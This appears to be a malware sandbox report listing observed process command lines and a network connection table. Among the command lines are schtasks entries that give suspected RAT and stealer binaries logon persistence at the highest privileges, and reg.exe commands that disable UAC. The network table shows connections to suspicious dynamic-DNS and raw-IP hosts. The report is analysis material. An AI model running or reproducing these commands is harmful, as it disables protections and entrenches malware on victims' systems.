"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tel0N9UQ34hY.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\msf.exe
"C:\Users\Admin\Desktop\Files\msf.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6200 -ip 6200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 1236
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6200 -ip 6200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 1244
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\ProgramData\sommnx\bmxe.exe
"C:\ProgramData\sommnx\bmxe.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Rps1Drc3i6nT.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LoDrERSbzhN2.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 796 -ip 796
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 796 -s 1916
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Desktop\Files\jignesh.exe
"C:\Users\Admin\Desktop\Files\jignesh.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\Desktop\Files\NOTallowedtocrypt.exe
"C:\Users\Admin\Desktop\Files\NOTallowedtocrypt.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BvcyyA97w0hk.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe
"C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\Desktop\Files\svchost.exe
svchost.exe
C:\Windows\SysWOW64\rmclient.exe
rmclient.exe
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004BC 0x00000000000004C8
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\yoyf.exe
"C:\Users\Admin\Desktop\Files\yoyf.exe"
C:\Users\Admin\Desktop\Files\SharpHound.exe
"C:\Users\Admin\Desktop\Files\SharpHound.exe"
C:\Users\Admin\Desktop\Files\winX32.exe
"C:\Users\Admin\Desktop\Files\winX32.exe"
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\ProgramData\sommnx\bmxe.exe
C:\ProgramData\sommnx\bmxe.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Local\Temp\StUpdate.exe
C:\Users\Admin\AppData\Local\Temp/StUpdate.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\g9SSX2bshVB0.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\SharpHound.exe
"C:\Users\Admin\Desktop\Files\SharpHound.exe"
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Users\Admin\Desktop\Files\winX32.exe
"C:\Users\Admin\Desktop\Files\winX32.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WZk6Sw3oUfda.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\ProgramData\sommnx\bmxe.exe
"C:\ProgramData\sommnx\bmxe.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UJFyZlg1NKTf.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\jignesh.exe
"C:\Users\Admin\Desktop\Files\jignesh.exe"
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pHW7WegWhary.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\Discord.exe
"C:\Users\Admin\Desktop\Files\Discord.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe
"C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gM7yqR5MXayd.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qaFVyoxPIEUe.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\ProgramData\sommnx\bmxe.exe
C:\ProgramData\sommnx\bmxe.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\StUpdate.exe
C:\Users\Admin\AppData\Local\Temp/StUpdate.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YPe0OYzvdTtm.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uLv2aTQc0OcY.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\ProgramData\sommnx\bmxe.exe
"C:\ProgramData\sommnx\bmxe.exe"
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XwvStCtpEqoJ.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\j1goxeU1EauG.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\ProgramData\sommnx\bmxe.exe
C:\ProgramData\sommnx\bmxe.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Local\Temp\StUpdate.exe
C:\Users\Admin\AppData\Local\Temp/StUpdate.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eOhLQcJh0MZU.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rTQ5Dc2zbKug.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.mozilla.org | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| N/A | 127.0.0.1:49827 | tcp | |
| US | 151.101.67.19:443 | www.mozilla.org | tcp |
| US | 151.101.67.19:443 | www.mozilla.org | tcp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 151.101.67.19:443 | www.mozilla.org | tcp |
| US | 34.149.97.1:443 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| N/A | 127.0.0.1:49836 | tcp | |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | support.mozilla.org | udp |
| US | 34.149.128.2:443 | support.mozilla.org | tcp |
| US | 8.8.8.8:53 | us-west1.prod.sumo.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 172.169.87.222:443 | msedge.api.cdp.microsoft.com | tcp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| IE | 20.223.54.233:443 | links.duckduckgo.com | tcp |
| IE | 20.223.54.233:443 | links.duckduckgo.com | tcp |
| GB | 104.91.71.146:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| US | 8.8.8.8:53 | learn.microsoft.com | udp |
| US | 8.8.8.8:53 | improving.duckduckgo.com | udp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| US | 8.8.8.8:53 | external-content.duckduckgo.com | udp |
| GB | 23.37.198.97:443 | learn.microsoft.com | tcp |
| US | 8.8.8.8:53 | e13636.dscb.akamaiedge.net | udp |
| US | 8.8.8.8:53 | js.monitor.azure.com | udp |
| US | 13.107.246.65:443 | js.monitor.azure.com | tcp |
| US | 13.107.246.65:443 | js.monitor.azure.com | tcp |
| US | 13.107.246.65:443 | js.monitor.azure.com | tcp |
| US | 13.107.246.65:443 | js.monitor.azure.com | tcp |
| US | 8.8.8.8:53 | s-part-0037.t-0009.t-msedge.net | udp |
| US | 8.8.8.8:53 | location.services.mozilla.com | udp |
| US | 35.190.72.216:443 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| GB | 172.217.169.78:443 | redirector.gvt1.com | tcp |
| GB | 172.217.169.78:443 | redirector.gvt1.com | udp |
| GB | 74.125.105.7:443 | r2.sn-aigl6ns6.gvt1.com | tcp |
| GB | 74.125.105.7:443 | r2.sn-aigl6ns6.gvt1.com | udp |
| NL | 2.18.121.73:80 | ciscobinary.openh264.org | tcp |
| US | 52.182.143.210:443 | onedscolprdcus10.centralus.cloudapp.azure.com | tcp |
| US | 52.182.143.210:443 | onedscolprdcus10.centralus.cloudapp.azure.com | tcp |
| US | 8.8.8.8:53 | browser.events.data.microsoft.com | udp |
| US | 8.8.8.8:53 | onedscolprdcus10.centralus.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | onedscolprdwus10.westus.cloudapp.azure.com | udp |
| US | 13.107.246.65:443 | download.sysinternals.com | tcp |
| US | 13.107.246.65:443 | download.sysinternals.com | tcp |
| US | 8.8.8.8:53 | onedscolprdwus10.westus.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | browser.events.data.microsoft.com | udp |
| US | 8.8.8.8:53 | onedscolprdgwc02.germanywestcentral.cloudapp.azure.com | udp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| US | 8.8.8.8:53 | duckduckgo.com | udp |
| US | 8.8.8.8:53 | links.duckduckgo.com | udp |
| IE | 20.223.54.233:443 | links.duckduckgo.com | tcp |
| US | 8.8.8.8:53 | external-content.duckduckgo.com | udp |
| US | 8.8.8.8:53 | onedscolprdwus11.westus.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | browser.events.data.microsoft.com | udp |
| US | 20.189.173.10:443 | onedscolprdwus09.westus.cloudapp.azure.com | tcp |
| US | 8.8.8.8:53 | browser.events.data.microsoft.com | udp |
| US | 8.8.8.8:53 | onedscolprdwus09.westus.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | onedscolprdwus09.westus.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | browser.events.data.microsoft.com | udp |
| US | 8.8.8.8:53 | browser.events.data.microsoft.com | udp |
| US | 8.8.8.8:53 | onedscolprdweu12.westeurope.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | onedscolprdweu12.westeurope.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | browser.events.data.microsoft.com | udp |
| US | 8.8.8.8:53 | onedscolprdwus12.westus.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | browser.events.data.microsoft.com | udp |
| US | 8.8.8.8:53 | onedscolprdwus12.westus.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | e13636.dscb.akamaiedge.net | udp |
| GB | 23.37.198.97:443 | e13636.dscb.akamaiedge.net | tcp |
| US | 8.8.8.8:53 | learn.microsoft.com | udp |
| US | 8.8.8.8:53 | e13636.dscb.akamaiedge.net | udp |
| US | 8.8.8.8:53 | wcpstatic.microsoft.com | udp |
| US | 8.8.8.8:53 | js.monitor.azure.com | udp |
| US | 8.8.8.8:53 | s-part-0037.t-0009.t-msedge.net | udp |
| US | 13.107.246.65:443 | s-part-0037.t-0009.t-msedge.net | tcp |
| US | 13.107.246.65:443 | s-part-0037.t-0009.t-msedge.net | tcp |
| US | 8.8.8.8:53 | onedscolprdwus12.westus.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | download.sysinternals.com | udp |
| US | 13.107.246.65:443 | download.sysinternals.com | tcp |
| GB | 104.91.71.146:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 199.232.214.172:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | onedscolprdwus10.westus.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.194.49:443 | urlhaus.abuse.ch | tcp |
| CN | 8.141.166.236:10020 | tcp | |
| US | 151.101.194.49:443 | urlhaus.abuse.ch | tcp |
| VN | 103.167.89.125:80 | tcp | |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| RU | 185.215.113.209:80 | tcp | |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | late-lil.at.ply.gg | udp |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | late-lil.at.ply.gg | udp |
| US | 8.8.8.8:53 | pb.agnt.ru | udp |
| RU | 45.90.34.133:80 | pb.agnt.ru | tcp |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 73.62.14.5:4782 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| TR | 94.156.177.33:80 | tcp | |
| NL | 89.110.69.103:80 | 89.110.69.103 | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
